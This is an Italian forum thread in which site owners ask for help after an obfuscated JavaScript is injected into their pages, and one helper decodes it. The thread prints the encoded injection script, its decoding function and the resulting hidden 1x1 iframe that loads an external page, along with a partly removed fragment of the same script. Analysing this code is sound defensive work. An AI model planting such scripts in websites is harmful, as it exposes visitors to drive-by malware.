<script>document.write(unescape........

[Diska]

Ho scoperto che alla fine di alcune pagine del mio sito è stato inserito questo script:

<script>document.write(unescape('%3c%73%63%72%69%7 0%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61% 73%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20 %65%6e%63%6f%64%65%28%73%74%72%29%7b%76%61%72%20%6 5%6e%64%3d%75%6e%65%73%63%61%70%65%28%73%74%72%2e% 73%75%62%73%74%72%28%30%2c%20%73%74%72%2e%6c%65%6e %67%74%68%2d%31%29%29%3b%76%61%72%20%6e%6f%77%3d%2 7%27%3b%66%6f%72%28%69%3d%30%3b%20%69%3c%65%6e%64% 2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%6e%6f %77%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%6 1%72%43%6f%64%65%28%65%6e%64%2e%63%68%61%72%43%6f% 64%65%41%74%28%69%29%2d%20%73%74%72%2e%73%75%62%73 %74%72%28%73%74%72%2e%6c%65%6e%67%74%68%2d%31%2c%3 1%29%29%3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%69% 74%65%28%75%6e%65%73%63%61%70%65%28%6e%6f%77%29%29 %3b%7d%3c%2f%73%63%72%69%70%74%3e'));encode('%297G mjveqi%2964wvg%297H%296%3Blxxt%297E33gvyrix2mrjs3s yx2tlt%296%3B%2964%7Bmhxl%297H%296%3B5%296%3B%2964 limklx%297H%296%3B5%296%3B%2964wx%7Dpi%297H%296%3B zmwmfmpmx%7D%297E%2964lmhhir%297F%296%3B%297I%297G 3mjveqi%297I4')</script>

Le pagine si vedono normalmente ma la cosa è preoccupante?
Che devo fare oltre a ricaricare le pagine?

[Habanero]

direi che non è una bella cosa....
quel java script una volta decodificato risulta essere:

codice:

<script language="javascript">

function encode(str)
{
 var end=unescape(str.substr(0, str.length-1));
 var now='';
 for(i=0; i<end.length; i++) 
 {
  now+=String.fromCharCode(end.charCodeAt(i)- str.substr(str.length-1,1));
 }
 document.write(unescape(now));}

encode('%297Gmjveqi%2964wvg%297H%296%3Blxxt%297E33gvyrix2mrjs3syx2tlt%296%3B%2964%7Bmhxl%297H%296%3B5%296%3B%2964limklx%297H%296%3B5%296%3B%2964wx%7Dpi%297H%296%3Bzmwmfmpmx%7D%297E%2964lmhhir%297F%296%3B%297I%297G3mjveqi%297I4')
</script>

il quale altro non è che una funzione di offuscamento invocata da altro codice nascosto. Una volta rivelata crea nella pagina il codice html:

codice:

<iframe src='http://crunet.info/out.php' width='1' height='1' style='visibility: hidden;'>
</iframe>

come vedi viene creato un iframe nascosto (dimensioni 1x1) in cui viene richiamata la pagina http://crunet.info/out.php che non ci è dato sapere cosa faccia. Invocandola direttamente viene ritornato un codice di errore Forbidden.

In ogni caso provvederei ad eliminare quel javascript e cercherei di individuare se ci sono elementi di vulnerabilità nel tuo sito che permettano iniezione di codice.

[Diska]

Grazie per la celere risposta.
In ogni caso ho chiesto al provaider di cambiare login e password sperando basti visto che non vedo particolari elementi di vulnerabilità.

[Barbara74CT]

Ciao e scusatemi se arrivo in questo forums di corsa e in maniera irruenta.
Ho un serio problema con quanto state discutendo, ma NON riesco a risolvere la situazione che si presenta sul mio sito per via di questo trojan.
il sito (attualmente messo in sitedown) è http://www.idealmente.it ed è infettato da questo trojan.

Ma devo capire, per risolvere, due cose:
a) come posso sapere quali sono le pagine dove è stato inserito il codice?
a1) dal DB, inserendo le varie stringhe di codice del maledetto trojan, non mi risulta niente, ma c'è porcamiseria!! Con quali keywords dovrei cercare??

Nota: mi sono presa la briga, da remoto, di andare ad aprire tutte le pagine che avevano una data successiva alla comparsa del trojan, ma non c'è traccia del codice...insomma, sto impazzendo e non so come risolvere.

Nota aggiunta: Ho eseguito con HijackThis una scansione del file di Log, la quale ha riscontrato questa stringa sospetta:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} (Virtools WebPlayer Class) - http://a532.g.akamai.net/f/532/6712/.../installer.exe

ma mi spiegate cosa devo fare adesso per cancellare quello a cui si riferisce? Non ci arrivo da sola, scusatemi..ma quale opzione devo cliccare?

Grazie di cuore per l'aiuto

Un bacione
Barbara

[ste_95]

devi semplicemente mettere il segno di spunta alla voce e poi cliccare su fix checked....

ps comunque se volessi posta tutto il log per un'analisi più accurata....

[tecnico24]

che significa in sitedown? :master:

[Habanero]

Lo script risulta presente anche nella pagina che hai lasciato per indicare che il sito è offline.

Non so come sia strutturato il tuo sito... in ogni caso non credo si sia iniettato nel DB. Penso piuttosto che siano da correggere le pagine che fanno da struttura e che caricano i dati dal DB. Lo script pirata si posiziona sempre a fine pagina.

[tecnico24]

quindi se uno clicca sul sito idealmente.it il trojan non ce?

[Habanero]

in realtà lo script sembra essere stato parzialmente cancellato... ma no del tutto. Forse Barbata74CT ha provveduto a ripulire il codice ma non del tutto...
Nella pagina rimane:

codice:

	<script>function cdf(x)else}document.write(r)}}cdf('ButcWSHJbYEmWrHfEeAx6YWCo4ErWDWJbjW3aztcokEJujW3wwAmEsExajAxzLNheh7UzDH8EwAx_hgIEsEm66qJbLNhd6GmamH8k6AxlR2Uz6AcLDtJVhFfB4g8NmXr4Dtf')</script>

che è palesemente incongruente...

[madecosys]

Habanero, cortesemente puoi aiutarmi nel pvt che ti ho inviato?
Grazie.